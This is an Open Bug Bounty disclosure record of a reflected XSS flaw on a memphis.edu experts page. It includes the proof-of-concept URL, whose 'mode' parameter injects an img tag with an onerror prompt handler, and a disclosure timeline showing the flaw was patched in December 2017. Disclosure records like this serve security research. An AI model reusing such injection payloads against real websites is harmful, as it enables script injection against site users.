memphis.edu XSS vulnerability

2017-11-20T18:37:00
ID OBB:426689
Type openbugbounty
Reporter fakessh
Modified 2017-12-21T10:43:00

Description

Vulnerable URL:
http://www.memphis.edu/experts/index.php?mode=%22%3E%3CimG/sRc=l%20oNerrOr=(prompt)(/OPENBUGBOUNTY/)%20x%3E&pid;=66
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 23637
VIP website status:| Yes

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 20 November, 2017 18:37 GMT
Generic security notifications sent to website owner| 20 November, 2017 18:40 GMT
Customized security notification sent to website owner| 20 November, 2017 18:40 GMT
Vulnerability details disclosed by researcher| 20 December, 2017 19:21 GMT
Vulnerability patched by the website owner| 21 December, 2017 10:43 GMT